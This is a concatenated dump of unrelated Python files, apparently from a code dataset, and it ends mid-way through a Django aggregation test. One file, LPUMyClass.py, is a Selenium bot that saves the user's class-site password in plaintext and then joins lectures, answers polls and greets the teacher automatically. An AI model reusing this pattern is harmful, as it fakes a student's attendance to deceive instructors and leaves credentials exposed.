FileFormat(\n name='motion_mats', directory=True, within_dir_exts=['.mat'],\n desc=(\"Format used for storing motion matrices produced during \"\n \"motion detection pipeline\"))\n\n\n# General image formats\ngif_format = FileFormat(name='gif', extension='.gif')\npng_format = FileFormat(name='png', extension='.png')\njpg_format = FileFormat(name='jpg', extension='.jpg')\n\n# PET formats\nlist_mode_format = FileFormat(name='pet_list_mode', extension='.bf')\n\n# Raw formats\ndat_format = FileFormat(name='dat', extension='.dat')\n\n# MRS format\nrda_format = FileFormat(name='raw', extension='.rda')\n\n# Record list of all data formats registered by module (not really\n# used currently but could be useful in future)\nregistered_file_formats = []\n\n# Register all data formats in module\nfor file_format in copy(globals()).values():\n if isinstance(file_format, FileFormat):\n FileFormat.register(file_format)\n registered_file_formats.append(file_format.name)\n\n# Since the conversion from DICOM->NIfTI is unfortunately slightly\n# different between MRConvert and Dcm2niix, these data formats can\n# be used in pipeline input specs that need to use MRConvert instead\n# of Dcm2niix (i.e. motion-detection pipeline)\nmrconvert_nifti_format = deepcopy(nifti_format)\nmrconvert_nifti_format._converters['dicom'] = MrtrixConverter\nmrconvert_nifti_gz_format = deepcopy(nifti_gz_format)\nmrconvert_nifti_gz_format._converters['dicom'] = MrtrixConverter\n","sub_path":"nianalysis/file_format.py","file_name":"file_format.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189701566","text":"import sys\nimport requests\n\nwords_to_check = sys.argv[1:]\n\n# This dictionary is a newline-separated list of words, in the format of:\n# `Word/FLAGS`, where `FLAGS` describes possible permutations of that word, See\n# https://cgit.freedesktop.org/libreoffice/dictionaries/tree/en/affDescription.txt\nDICTIONARY_URL = \"https://cgit.freedesktop.org/libreoffice/dictionaries/plain/en/en_US.dic\"\n\nresponse = requests.get(DICTIONARY_URL)\nword_definitions = response.text.splitlines()\n\n# The first line contains the number of words, which we don't need\nword_definitions.pop(0)\n\n# Compile your dictionary\nwords = []\nfor word_definition in word_definitions: \n word = word_definition.split(\"/\")[0] \n\n if len(word_definition.split(\"/\")) > 1: \n flags = word_definition.split(\"/\")[1]\n else:\n flags = \"\"\n\n words.append({\"word\": word, \"flags\": flags})\n\n\n#Find each word that's in the dictionary\n# for word in words: \n# for index, word_to_check in enumerate(words_to_check):\n# if word[\"word\"] == word_to_check:\n# print(f\"{word_to_check} is a word\")\n# words_to_check.pop(index)\n\n# # Any words remaining must not be words\n# for word_to_check in words_to_check:\n# print(f\"{word_to_check} is not a word\")\n\n\n\nfor word in words: \n for index, word_to_check in enumerate(words_to_check):\n if (word[\"word\"] == word_to_check):\n if (word_to_check[0] == word_to_check[0].lower()):\n print(f\"{word_to_check} is a word\")\n words_to_check.pop(index)\n else:\n print(f\"{word_to_check} is not a word\")\n words_to_check.pop(index)\n\n# Any words remaining must not be words\nfor word_to_check in words_to_check:\n print(f\"{word_to_check} is not a word\")\n 
\n\n\n\n\n\n\n","sub_path":"challenges/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"548104620","text":"# -*- coding: utf8 -*-\nimport time\nimport logging\n\nimport random\nimport base64\nimport hashlib\nimport hmac\nimport binascii\nimport copy\n\ntry:\n from urllib.parse import urlencode # Python3\nexcept ImportError:\n from urllib import urlencode # Python2\n\nclass TkeClient(object):\n \"\"\"\n CCE客户端配置\n \"\"\"\n\n def __init__(self, credential, action, host, uri, sign_method, version = None, region = ''):\n \"\"\"\n 云API类初始化,公共参数:\n credential: 公钥/私钥\n action:云API方法\n host:云APIhostname\n uri云API uri\n sign_method:签名算法\n version:云API Version\n region: 云API地域\n\n 调用继承类具体方法的时候可以修改上面参数\n \"\"\"\n self.credential = credential\n self.action = action\n\n self.host = host\n self.uri = uri\n self.sign_method = sign_method\n\n self.pub_param = {\n 'Action': self.action,\n 'SecretId': self.credential['secret_id'],\n }\n if region:\n self.region = region\n self.pub_param['Region'] = self.region\n if version:\n self.version = version\n self.pub_param['Version'] = self.version\n\n # sign应创建一个类\n def sign(self, method, param = None):\n final_param = {}\n final_param.update(self.pub_param)\n if param:\n final_param.update(param)\n sign_obj = Sign(self.credential['secret_key'], self.host, self.uri, self.sign_method, final_param)\n return sign_obj.sign_encode(method)\n\nclass Sign(object):\n \"\"\"\n 签名方法\n \"\"\"\n\n def __init__(self, secret_key, host, uri, sign_method, param):\n self.secret_key = secret_key\n self.host = host\n self.uri = uri\n self.sign_method =sign_method\n self.param = copy.deepcopy(param)\n self.param['Timestamp'] = int(time.time())\n self.param['Nonce'] = random.randint(0, 0xffff)\n\n def build(self, method):\n \"\"\"\n 生成签名凭证\n \"\"\"\n logging.debug(\"request params to sign: {}\".format(self.param))\n\n p = {}\n for k in self.param:\n if method == 'POST' and str(self.param[k])[0:1] == '@':\n continue\n p[k.replace('_', '.')] = self.param[k]\n ps = '&'.join('%s=%s' % (k, p[k]) for k in sorted(p))\n \n msg = '%s%s%s?%s' % (method.upper(), self.host, self.uri, ps)\n msg = bytes(msg, 'utf-8')\n secret_key = bytes(self.secret_key, 'utf-8')\n \n if self.sign_method == 'HmacSHA256':\n digestmod = hashlib.sha256\n else:\n digestmod = hashlib.sha1\n \n hashed = hmac.new(secret_key, msg, digestmod)\n base64 = binascii.b2a_base64(hashed.digest())[:-1]\n base64 = base64.decode()\n return base64\n\n def sign_encode(self, method):\n \"\"\"\n 对签名结果做编码处理\n \"\"\"\n # 获取签名\n sign_str = self.build(method)\n # 增加签名段\n self.param[\"Signature\"] = sign_str\n # 生成的签名串并不能直接作为请求参数,需要对其进行 URL 编码\n return urlencode(self.param)\n","sub_path":"base/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"293703853","text":"#################---//open this app at the exact time of lecture start\\\\---########################\nimport os\ntry:\n from selenium import webdriver\n from webdriver_manager.chrome import ChromeDriverManager\n from tkinter import Tk\n from tkinter import simpledialog\n import os\n import time\n import datetime\n from selenium.webdriver.support.ui import WebDriverWait\n from selenium.webdriver.common.by import By\n from selenium.webdriver.support import expected_conditions as EC\n from selenium.webdriver.common.keys 
import Keys\nexcept:\n os.system('pip install selenium')\n os.system('pip install webdriver-manager')\n os.system('pip install datetime')\n os.system('pip install tk')\n os.system('pip install urllib3')\nfinally:\n from selenium import webdriver\n from webdriver_manager.chrome import ChromeDriverManager\n from tkinter import Tk\n from tkinter import simpledialog\n import os\n import time\n import datetime\n from selenium.webdriver.support.ui import WebDriverWait\n from selenium.webdriver.common.by import By\n from selenium.webdriver.support import expected_conditions as EC\n from selenium.webdriver.common.keys import Keys\n\nroot=Tk()\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.maximize_window()\n\ndef get_details():\n global usrnm\n global pswd\n root.withdraw()\n if os.path.isfile('login_up.txt'):\n f=open('login_up.txt','r')\n usrnm=f.readline()\n pswd=f.readline()\n else:\n f=open('login_up.txt','w')\n usrnm=simpledialog.askstring(title=\"Username\",prompt=\"Enter the Username here:\")\n f.write(\"u-\"+usrnm+\"\\n\")\n pswd=simpledialog.askstring(title=\"Password\",prompt=\"Enter the Password here:\")\n f.write(\"p-\"+pswd)\n f.close()\n f=open('login_up.txt','r')\n usrnm=f.readline()\n pswd=f.readline()\n f.close()\n \n usrnm=usrnm[2:10]\n pswd=pswd[2:]\n\ndef poll():\n try:\n try: # //*[@id=\"frame\"]\n frame = WebDriverWait(driver,1).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"frame\"]')))\n driver.switch_to.frame(frame)\n except Exception as e: \n print(\"-\",end=\"\")\n time.sleep(10)\n try:\n driver.find_element_by_xpath('//*[@id=\"app\"]/main/div[2]/div/span/div[2]/div[1]/button').click()\n print(\" :)Polled!\")\n except:\n print(\"-\",end=\"\")\n\n except Exception as e:\n print(\".\",end=\"\")\n\ndef wishTeacher():\n now = datetime.datetime.now()\n wish=\"\"\n if(now.minute <= 10):\n if(now.hour<12):\n wish=\"Good Morning\"\n elif(now.hour>=12 and now.hour<=16):\n wish=\"Good Afternoon\"\n else:\n wish=\"Good Evening\"\n\n try:\n WebDriverWait(driver,10).until(EC.visibility_of_element_located((By.XPATH,'//*[@id=\"app\"]/main/section/div/header/div/div[1]/div[1]/button')))\n time.sleep(7)\n driver.find_element_by_xpath('//*[@id=\"app\"]/main/section/div/header/div/div[1]/div[1]/button').click()\n driver.find_element_by_xpath('//*[@id=\"chat-toggle-button\"]').click()\n chatbox = driver.find_element_by_id(\"message-input\")\n # chatbox.send_keys(wish)\n chatbox.send_keys(wish)\n chatbox.send_keys(Keys.RETURN)\n except Exception as e:\n print(\"Teacher not wished:-(\")\n\ndef get_time(timest):\n #eg->9:00 AM - 10:00 AM\n timest=timest.split(\" -\") \n timest=timest[0]\n if 'AM' in timest:\n print(timest)\n final_time=timest[:-3]+':00'\n print(final_time)\n else:\n final_time=timest[:-3]\n final_time=final_time.split(\":\")\n temp=final_time[1]\n final_time=final_time[0]\n if not final_time=='12':\n addtwl=str(int(final_time)+12)\n final_time=addtwl+\":\"+temp+\":00\"\n else:\n addtwl=str(int(final_time)+0)\n final_time=addtwl+\":\"+temp+\":00\"\n print(final_time)\n return final_time\n\ndef jot(final_time):\n timestamp = time.strftime('%H:%M')\n print(timestamp)\n ft=final_time[0:5].split(':')\n ct=timestamp.split(':')\n print(ft,ct)\n diffh=-int(ft[0])+int(ct[0])\n diffm=-int(ft[1])+int(ct[1])\n diff=diffh*60+diffm\n print(diff)\n if diff>-1 and diff<=70:\n print(\"You are late by \"+str(diff)+\" m.\\nLets join...\")\n return 0\n elif diff>-1 and diff>70:\n print('Your class finished '+str(diff)+'m ago.')\n return -1\n else:\n print('You 
have '+str(-diff)+' m to start the class.')\n return diff\n\n\ndef join_audio():\n try:\n frame = WebDriverWait(driver, 300).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"frame\"]')))\n driver.switch_to.frame(frame)\n listenMode = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, '/html/body/div[2]/div/div/div[1]/div/div/span/button[2]')))\n listenMode.click()\n except Exception as e:\n print(\"No Audio Mode\")\n print(\"Audio Mode Selected\")\n\n\ndef site_login():\n driver.get(\"https://myclass.lpu.in/\")\n get_details()\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[6]/input[1]').send_keys(usrnm)\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[6]/input[2]').send_keys(pswd)\n driver.find_element_by_xpath('/html/body/div[2]/div/form/div[7]/button').click()\n driver.find_element_by_xpath('//*[@id=\"homeCenterDiv\"]/div/div[1]/div/div[2]/a').click()\n# //*[@id=\"homeCenterDiv\"]/div/div[1]/div/div[2]/a\n time.sleep(5)\n \n a=[]\n links=[]\n b=[]\n clstime=[]\n count=0\n a=driver.find_elements_by_css_selector(\".fc-time-grid-event.fc-event.fc-start.fc-end\")\n for i in range (len(a)):\n app=str(i+1)\n b.append(driver.find_element_by_xpath('//*[@id=\"calendar\"]/div[2]/div/table/tbody/tr/td/div/div/div[3]/table/tbody/tr/td[2]/div/div[2]/a['+app+']/div/div[1]'))\n for i in a:\n links.append(i.get_attribute(\"href\"))\n count+=1\n for i in b:\n print(i.get_attribute(\"data-full\"))\n clstime.append(get_time(i.get_attribute(\"data-full\")))\n # final_time=i.get_attribute(\"data-full\")\n # print(final_time)\n # # final_time=get_time(final_time)\n # clstime.append(i.get_attribute(i.get_attribute(\"data-full\")))\n\n # print(a)\n # print(links)\n # print(clstime)\n\n wincnt=1\n\n\n\n #time wise attendence\n # for prd in clstime:\n # if jot(prd)==1:\n # driver.get(links[clscount])\n # elif jot(prd)==0:\n # print('classdone')\n # else:\n # time.sleep(jot(-prd*60))\n # clscount=clscount+1\n\n for j in links:\n try:\n jot(clstime[wincnt-1])\n except:\n print('jot//no')\n driver.get(j)\n time.sleep(1)\n try:\n driver.find_element_by_css_selector(\".btn.btn-primary.btn-block.btn-sm\").click()\n flag=True\n except Exception as e:\n print(\"Join btn not found A.K.A #SEDLYF #STRUGGLEISREAL\")\n flag=False\n if flag:\n join_audio()\n wishTeacher()\n time.sleep(5)\n for k in range(11):\n # try:\n # driver.find_element_by_id(\"message-input\").send_keys(\"Okay\")\n # driver.find_element_by_id(\"message-input\").send_keys(Keys.RETURN)\n # except Exception as e:\n # print(\"Msg box and ok btn not found\")\n # break\n for l in range(300):\n time.sleep(1)\n poll()\n \n print(\"\\n----------------#---------------------#------------------#-----------------------\") \n driver.execute_script(\"window.open('');\")\n driver.switch_to.window(driver.window_handles[wincnt])\n wincnt+=1\nsite_login()\n\n\n\n\n\n","sub_path":"LPUMyClass.py","file_name":"LPUMyClass.py","file_ext":"py","file_size_in_byte":7890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"313341754","text":"import json, requests, base64, sys\n\nfrom io import BytesIO\nfrom flask import Flask, request\nfrom keras.preprocessing import image\n\nmodel_server_port = sys.argv[1]\nmodel_name = 'nsfw'\n\nserver_host = sys.argv[2]\nserver_port = int(sys.argv[3])\n\ntarget_size=(299, 299)\n\napp = Flask(__name__)\n\ndef predict_raw(image_array):\n\n instances = []\n \n for img in image_array:\n \n img = image.img_to_array(img) / 255.\n \n 
instances.append({ \"input_image\": img.astype('float16').tolist() })\n\n response = requests.post('http://127.0.0.1:' + model_server_port + '/v1/models/' + model_name + ':predict', json = { \n \n \"instances\": instances\n \n })\n \n return response.content.decode('utf-8')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n image_array = []\n \n for image_base64 in request.json:\n \n image_array.append(image.load_img(BytesIO(base64.b64decode(image_base64)),target_size=target_size))\n \n return predict_raw(image_array)\n \n@app.route('/predict_local', methods=['POST'])\ndef predict_local():\n\n image_array = []\n \n for image_path in request.json:\n \n image_array.append(image.load_img(image_path,target_size=target_size))\n\n return predict_raw(image_array)\n \napp.run(host=server_host, port=server_port)","sub_path":"extra/nsfw/flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288985613","text":"import os\nimport pandas as pd\n\nannotations_path = '../../muct/muct-landmarks/muct76-opencv.csv'\nannotations = pd.read_csv(annotations_path).drop_duplicates()\n\nimage_root = '../../muct/dataset'\n\nval_set = 'jpg_5'\ntraining_images = []\nimage_name_list = []\nfor root, dir, filenames in os.walk(image_root):\n if (root == os.path.join(image_root, val_set)) & (root != image_root):\n for filename in filenames:\n training_images.append(os.path.join(root.split('/')[-1], filename))\n image_name_list.append(filename.split('.')[0])\n\ntraining_items = []\nannotations_columns = list(annotations)\nannotations_columns.remove('tag')\nfor inx, item in annotations.iterrows():\n training_item = []\n name = item[0]\n if name in image_name_list:\n tmp = image_name_list.index(name)\n image_path = training_images[tmp]\n training_item.append(image_path)\n landmarks = item[2:]\n training_item.extend(landmarks)\n\n training_items.append(training_item)\n\ntraining = pd.DataFrame(training_items, columns=annotations_columns).reset_index(drop=True)\n\ntraining.to_csv('test.csv', index=False)","sub_path":"face-alignment-tensorflow/utils/create_train_test_csv.py","file_name":"create_train_test_csv.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407053744","text":"from __future__ import absolute_import\n\nimport datetime\nfrom decimal import Decimal\n\nfrom django.db.models import Avg, Sum, Count, Max, Min\nfrom django.test import TestCase, Approximate\n\nfrom .models import Author, Publisher, Book, Store\n\n\nclass BaseAggregateTestCase(TestCase):\n fixtures = [\"aggregation.json\"]\n\n def test_empty_aggregate(self):\n self.assertEqual(Author.objects.all().aggregate(), {})\n\n def test_single_aggregate(self):\n vals = Author.objects.aggregate(Avg(\"age\"))\n self.assertEqual(vals, {\"age__avg\": Approximate(37.4, places=1)})\n\n def test_multiple_aggregates(self):\n vals = Author.objects.aggregate(Sum(\"age\"), Avg(\"age\"))\n self.assertEqual(vals, {\"age__sum\": 337, \"age__avg\": Approximate(37.4, places=1)})\n\n def test_filter_aggregate(self):\n vals = Author.objects.filter(age__gt=29).aggregate(Sum(\"age\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"age__sum\"], 254)\n\n def test_related_aggregate(self):\n vals = Author.objects.aggregate(Avg(\"friends__age\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"friends__age__avg\"], 
34.07, places=2)\n\n vals = Book.objects.filter(rating__lt=4.5).aggregate(Avg(\"authors__age\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"authors__age__avg\"], 38.2857, places=2)\n\n vals = Author.objects.all().filter(name__contains=\"a\").aggregate(Avg(\"book__rating\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__rating__avg\"], 4.0)\n\n vals = Book.objects.aggregate(Sum(\"publisher__num_awards\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"publisher__num_awards__sum\"], 30)\n\n vals = Publisher.objects.aggregate(Sum(\"book__price\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__price__sum\"], Decimal(\"270.27\"))\n\n def test_aggregate_multi_join(self):\n vals = Store.objects.aggregate(Max(\"books__authors__age\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"books__authors__age__max\"], 57)\n\n vals = Author.objects.aggregate(Min(\"book__publisher__num_awards\"))\n self.assertEqual(len(vals), 1)\n self.assertEqual(vals[\"book__publisher__num_awards__min\"], 1)\n\n def test_aggregate_alias(self):\n vals = Store.objects.filter(name=\"Amazon.com\").aggregate(amazon_mean=Avg(\"books__rating\"))\n self.assertEqual(len(vals), 1)\n self.assertAlmostEqual(vals[\"amazon_mean\"], 4.08, places=2)\n\n def test_annotate_basic(self):\n self.assertQuerysetEqual(\n Book.objects.annotate().order_by('pk'), [\n \"The Definitive Guide to Django: Web Development Done Right\",\n \"Sams Teach Yourself Django in 24 Hours\",\n \"Practical Django Projects\",\n \"Python Web Development with Django\",\n \"Artificial Intelligence: A Modern Approach\",\n \"Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp\"\n ],\n lambda b: b.name\n )\n\n books = Book.objects.annotate(mean_age=Avg(\"authors__age\"))\n b = books.get(pk=1)\n self.assertEqual(\n b.name,\n 'The Definitive Guide to Django: Web Development Done Right'\n )\n self.assertEqual(b.mean_age, 34.5)\n\n def test_annotate_m2m(self):\n books = Book.objects.filter(rating__lt=4.5).annotate(Avg(\"authors__age\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 51.5),\n ('Practical Django Projects', 29.0),\n ('Python Web Development with Django', Approximate(30.3, places=1)),\n ('Sams Teach Yourself Django in 24 Hours', 45.0)\n ],\n lambda b: (b.name, b.authors__age__avg),\n )\n\n books = Book.objects.annotate(num_authors=Count(\"authors\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 2),\n ('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 1),\n ('Practical Django Projects', 1),\n ('Python Web Development with Django', 3),\n ('Sams Teach Yourself Django in 24 Hours', 1),\n ('The Definitive Guide to Django: Web Development Done Right', 2)\n ],\n lambda b: (b.name, b.num_authors)\n )\n\n def test_backwards_m2m_annotate(self):\n authors = Author.objects.filter(name__contains=\"a\").annotate(Avg(\"book__rating\")).order_by(\"name\")\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 4.5),\n ('Brad Dayley', 3.0),\n ('Jacob Kaplan-Moss', 4.5),\n ('James Bennett', 4.0),\n ('Paul Bissex', 4.0),\n ('Stuart Russell', 4.0)\n ],\n lambda a: (a.name, a.book__rating__avg)\n )\n\n authors = Author.objects.annotate(num_books=Count(\"book\")).order_by(\"name\")\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 1),\n ('Brad Dayley', 1),\n ('Jacob Kaplan-Moss', 1),\n ('James Bennett', 1),\n 
('Jeffrey Forcier', 1),\n ('Paul Bissex', 1),\n ('Peter Norvig', 2),\n ('Stuart Russell', 1),\n ('Wesley J. Chun', 1)\n ],\n lambda a: (a.name, a.num_books)\n )\n\n def test_reverse_fkey_annotate(self):\n books = Book.objects.annotate(Sum(\"publisher__num_awards\")).order_by(\"name\")\n self.assertQuerysetEqual(\n books, [\n ('Artificial Intelligence: A Modern Approach', 7),\n ('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 9),\n ('Practical Django Projects', 3),\n ('Python Web Development with Django', 7),\n ('Sams Teach Yourself Django in 24 Hours', 1),\n ('The Definitive Guide to Django: Web Development Done Right', 3)\n ],\n lambda b: (b.name, b.publisher__num_awards__sum)\n )\n\n publishers = Publisher.objects.annotate(Sum(\"book__price\")).order_by(\"name\")\n self.assertQuerysetEqual(\n publishers, [\n ('Apress', Decimal(\"59.69\")),\n (\"Jonno's House of Books\", None),\n ('Morgan Kaufmann', Decimal(\"75.00\")),\n ('Prentice Hall', Decimal(\"112.49\")),\n ('Sams', Decimal(\"23.09\"))\n ],\n lambda p: (p.name, p.book__price__sum)\n )\n\n def test_annotate_values(self):\n books = list(Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values())\n self.assertEqual(\n books, [\n {\n \"contact_id\": 1,\n \"id\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\",\n \"pages\": 447,\n \"price\": Approximate(Decimal(\"30\")),\n \"pubdate\": datetime.date(2007, 12, 6),\n \"publisher_id\": 1,\n \"rating\": 4.5,\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg('authors__age')).values('pk', 'isbn', 'mean_age')\n self.assertEqual(\n list(books), [\n {\n \"pk\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).annotate(mean_age=Avg(\"authors__age\")).values(\"name\")\n self.assertEqual(\n list(books), [\n {\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\"\n }\n ]\n )\n\n books = Book.objects.filter(pk=1).values().annotate(mean_age=Avg('authors__age'))\n self.assertEqual(\n list(books), [\n {\n \"contact_id\": 1,\n \"id\": 1,\n \"isbn\": \"159059725\",\n \"mean_age\": 34.5,\n \"name\": \"The Definitive Guide to Django: Web Development Done Right\",\n \"pages\": 447,\n \"price\": Approximate(Decimal(\"30\")),\n \"pubdate\": datetime.date(2007, 12, 6),\n \"publisher_id\": 1,\n \"rating\": 4.5,\n }\n ]\n )\n\n books = Book.objects.values(\"rating\").annotate(n_authors=Count(\"authors__id\"), mean_age=Avg(\"authors__age\")).order_by(\"rating\")\n self.assertEqual(\n list(books), [\n {\n \"rating\": 3.0,\n \"n_authors\": 1,\n \"mean_age\": 45.0,\n },\n {\n \"rating\": 4.0,\n \"n_authors\": 6,\n \"mean_age\": Approximate(37.16, places=1)\n },\n {\n \"rating\": 4.5,\n \"n_authors\": 2,\n \"mean_age\": 34.5,\n },\n {\n \"rating\": 5.0,\n \"n_authors\": 1,\n \"mean_age\": 57.0,\n }\n ]\n )\n\n authors = Author.objects.annotate(Avg(\"friends__age\")).order_by(\"name\")\n self.assertEqual(len(authors), 9)\n self.assertQuerysetEqual(\n authors, [\n ('Adrian Holovaty', 32.0),\n ('Brad Dayley', None),\n ('Jacob Kaplan-Moss', 29.5),\n ('James Bennett', 34.0),\n ('Jeffrey Forcier', 27.0),\n ('Paul Bissex', 31.0),\n ('Peter Norvig', 46.0),\n ('Stuart Russell', 57.0),\n ('Wesley J. 
Chun', Approximate(33.66, places=1))\n ],\n lambda a: (a.name, a.friends__age__avg)\n )\n\n def test_count(self):\n vals = Book.objects.aggregate(Count(\"rating\"))\n self.assertEqual(vals, {\"rating__count\": 6})\n\n vals = Book.objects.aggregate(Count(\"rating\", distinct=True))\n self.assertEqual(vals, {\"rating__count\": 4})\n\n def test_fkey_aggregate(self):\n explicit = list(Author.objects.annotate(Count('book__id')))\n implicit = list(Author.objects.annotate(Count('book')))\n self.assertEqual(explicit, implicit)\n\n def test_annotate_ordering(self):\n books = Book.objects.values('rating').annotate(oldest=Max('authors__age')).order_by('oldest', 'rating')\n self.assertEqual(\n list(books), [\n {\n \"rating\": 4.5,\n \"oldest\": 35,\n },\n {\n \"rating\": 3.0,\n \"oldest\": 45\n },\n {\n \"rating\": 4.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 5.0,\n \"oldest\": 57,\n }\n ]\n )\n\n books = Book.objects.values(\"rating\").annotate(oldest=Max(\"authors__age\")).order_by(\"-oldest\", \"-rating\")\n self.assertEqual(\n list(books), [\n {\n \"rating\": 5.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 4.0,\n \"oldest\": 57,\n },\n {\n \"rating\": 3.0,\n \"oldest\": 45,\n },\n {\n \"rating\": 4.5,\n \"oldest\": 35,\n }\n ]\n )\n\n def test_aggregate_annotation(self):\n vals = Book.objects.annotate(num_authors=Count(\"authors__id\")).aggregate(Avg(\"num_authors\"))\n self.assertEqual(vals, {\"num_authors__avg\": Approximate(1.66, places=1)})\n\n def test_filtering(self):\n p = Publisher.objects.create(name='Expensive Publisher', num_awards=0)\n Book.objects.create(\n name='ExpensiveBook1',\n pages=1,\n isbn='111',\n rating=3.5,\n price=Decimal(\"1000\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,1)\n )\n Book.objects.create(\n name='ExpensiveBook2',\n pages=1,\n isbn='222',\n rating=4.0,\n price=Decimal(\"1000\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,2)\n )\n Book.objects.create(\n name='ExpensiveBook3',\n pages=1,\n isbn='333',\n rating=4.5,\n price=Decimal(\"35\"),\n publisher=p,\n contact_id=1,\n pubdate=datetime.date(2008,12,3)\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1, book__price__lt=Decimal(\"40.0\")).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__range=[1, 3]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Morgan Kaufmann\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__range=[1, 
2]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Sams\",\n \"Prentice Hall\",\n \"Morgan Kaufmann\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__in=[1, 3]).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Sams\",\n \"Morgan Kaufmann\",\n \"Expensive Publisher\",\n ],\n lambda p: p.name,\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book\")).filter(num_books__isnull=True)\n self.assertEqual(len(publishers), 0)\n\n def test_annotation(self):\n vals = Author.objects.filter(pk=1).aggregate(Count(\"friends__id\"))\n self.assertEqual(vals, {\"friends__id__count\": 2})\n\n books = Book.objects.annotate(num_authors=Count(\"authors__name\")).filter(num_authors__gte=2).order_by(\"pk\")\n self.assertQuerysetEqual(\n books, [\n \"The Definitive Guide to Django: Web Development Done Right\",\n \"Artificial Intelligence: A Modern Approach\",\n ],\n lambda b: b.name\n )\n\n authors = Author.objects.annotate(num_friends=Count(\"friends__id\", distinct=True)).filter(num_friends=0).order_by(\"pk\")\n self.assertQuerysetEqual(\n authors, [\n \"Brad Dayley\",\n ],\n lambda a: a.name\n )\n\n publishers = Publisher.objects.annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1).order_by(\"pk\")\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n \"Prentice Hall\",\n ],\n lambda p: p.name\n )\n\n publishers = Publisher.objects.filter(book__price__lt=Decimal(\"40.0\")).annotate(num_books=Count(\"book__id\")).filter(num_books__gt=1)\n self.assertQuerysetEqual(\n publishers, [\n \"Apress\",\n ],\n lambda p: p.name\n )\n\n books = Book.objects.annotate(num_authors=Count(\"authors__id\")).filter(authors__name__contains=\"Norvig\", num_authors__gt=1)\n self.assertQuerysetEqual(\n books, [\n \"Artificial Intelligence: A Modern Approach\",\n ],\n lambda b: b.name\n )\n\n def test_more_aggregation(self):\n a = Author.objects.get(name__contains='Norvig')\n b = Book.objects.get(name__contains='Done Right')\n b.authors.add(a)\n b.save()\n\n vals = 